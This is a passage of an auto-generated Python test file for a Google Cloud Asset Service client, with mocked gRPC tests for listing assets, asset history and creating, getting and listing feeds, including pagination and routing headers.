def test_list_assets(transport: str = 'grpc', request_type=asset_service.ListAssetsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse(
next_page_token='next_page_token_value',
)
response = client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListAssetsPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_assets_from_dict():
test_list_assets(request_type=dict)
def test_list_assets_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
client.list_assets()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
@pytest.mark.asyncio
async def test_list_assets_async(transport: str = 'grpc_asyncio', request_type=asset_service.ListAssetsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse(
next_page_token='next_page_token_value',
))
response = await client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListAssetsAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_assets_async_from_dict():
await test_list_assets_async(request_type=dict)
def test_list_assets_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
call.return_value = asset_service.ListAssetsResponse()
client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_assets_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse())
await client.list_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_assets_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_assets(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_assets_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_assets(
asset_service.ListAssetsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_assets_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListAssetsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListAssetsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_assets(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_assets_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_assets(
asset_service.ListAssetsRequest(),
parent='parent_value',
)
def test_list_assets_pager():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_assets(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, assets.Asset)
for i in results)
def test_list_assets_pages():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
pages = list(client.list_assets(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_assets_async_pager():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
async_pager = await client.list_assets(request={},)
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, assets.Asset)
for i in responses)
@pytest.mark.asyncio
async def test_list_assets_async_pages():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_assets),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
assets.Asset(),
],
next_page_token='abc',
),
asset_service.ListAssetsResponse(
assets=[],
next_page_token='def',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
],
next_page_token='ghi',
),
asset_service.ListAssetsResponse(
assets=[
assets.Asset(),
assets.Asset(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_assets(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_batch_get_assets_history(transport: str = 'grpc', request_type=asset_service.BatchGetAssetsHistoryRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.BatchGetAssetsHistoryResponse(
)
response = client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.BatchGetAssetsHistoryResponse)
def test_batch_get_assets_history_from_dict():
test_batch_get_assets_history(request_type=dict)
def test_batch_get_assets_history_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
client.batch_get_assets_history()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
@pytest.mark.asyncio
async def test_batch_get_assets_history_async(transport: str = 'grpc_asyncio', request_type=asset_service.BatchGetAssetsHistoryRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.BatchGetAssetsHistoryResponse(
))
response = await client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.BatchGetAssetsHistoryRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.BatchGetAssetsHistoryResponse)
@pytest.mark.asyncio
async def test_batch_get_assets_history_async_from_dict():
await test_batch_get_assets_history_async(request_type=dict)
def test_batch_get_assets_history_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.BatchGetAssetsHistoryRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
call.return_value = asset_service.BatchGetAssetsHistoryResponse()
client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_batch_get_assets_history_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.BatchGetAssetsHistoryRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.batch_get_assets_history),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.BatchGetAssetsHistoryResponse())
await client.batch_get_assets_history(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_feed(transport: str = 'grpc', request_type=asset_service.CreateFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_create_feed_from_dict():
test_create_feed(request_type=dict)
def test_create_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
client.create_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
@pytest.mark.asyncio
async def test_create_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.CreateFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.CreateFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_create_feed_async_from_dict():
await test_create_feed_async(request_type=dict)
def test_create_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.CreateFeedRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_create_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.CreateFeedRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.create_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_feed(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_create_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_feed(
asset_service.CreateFeedRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_create_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_feed(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_create_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_feed(
asset_service.CreateFeedRequest(),
parent='parent_value',
)
def test_get_feed(transport: str = 'grpc', request_type=asset_service.GetFeedRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
)
response = client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
def test_get_feed_from_dict():
test_get_feed(request_type=dict)
def test_get_feed_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
client.get_feed()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
@pytest.mark.asyncio
async def test_get_feed_async(transport: str = 'grpc_asyncio', request_type=asset_service.GetFeedRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed(
name='name_value',
asset_names=['asset_names_value'],
asset_types=['asset_types_value'],
content_type=asset_service.ContentType.RESOURCE,
))
response = await client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.GetFeedRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.Feed)
assert response.name == 'name_value'
assert response.asset_names == ['asset_names_value']
assert response.asset_types == ['asset_types_value']
assert response.content_type == asset_service.ContentType.RESOURCE
@pytest.mark.asyncio
async def test_get_feed_async_from_dict():
await test_get_feed_async(request_type=dict)
def test_get_feed_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.GetFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
call.return_value = asset_service.Feed()
client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
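    # Routing headers are attached as ('x-goog-request-params', '<field>=<value>')
    # tuples in the metadata kwarg passed to the stub call.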
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_feed_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.GetFeedRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
await client.get_feed(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_feed_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.Feed()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_feed_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_feed(
asset_service.GetFeedRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_feed_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_feed),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.Feed())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_feed(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_feed_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_feed(
asset_service.GetFeedRequest(),
name='name_value',
)
def test_list_feeds(transport: str = 'grpc', request_type=asset_service.ListFeedsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListFeedsResponse(
)
response = client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.ListFeedsResponse)
def test_list_feeds_from_dict():
test_list_feeds(request_type=dict)
def test_list_feeds_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
client.list_feeds()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
@pytest.mark.asyncio
async def test_list_feeds_async(transport: str = 'grpc_asyncio', request_type=asset_service.ListFeedsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse(
))
response = await client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ListFeedsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, asset_service.ListFeedsResponse)
@pytest.mark.asyncio
async def test_list_feeds_async_from_dict():
await test_list_feeds_async(request_type=dict)
def test_list_feeds_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListFeedsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
call.return_value = asset_service.ListFeedsResponse()
client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_feeds_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ListFeedsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse())
await client.list_feeds(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_feeds_flattened():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = asset_service.ListFeedsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_feeds(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_feeds_flattened_error():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_feeds(
asset_service.ListFeedsRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_feeds_flattened_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_feeds),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(asset_service.ListFeedsResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_feeds(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_feeds_flattened_error_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_feeds(
asset_service.ListFeedsRequest(),
parent='parent_value',
)
def test_update_feed(transport: str = 'grpc', request_type=asset_service.UpdateFeedRequest):
client = AssetServiceClient(
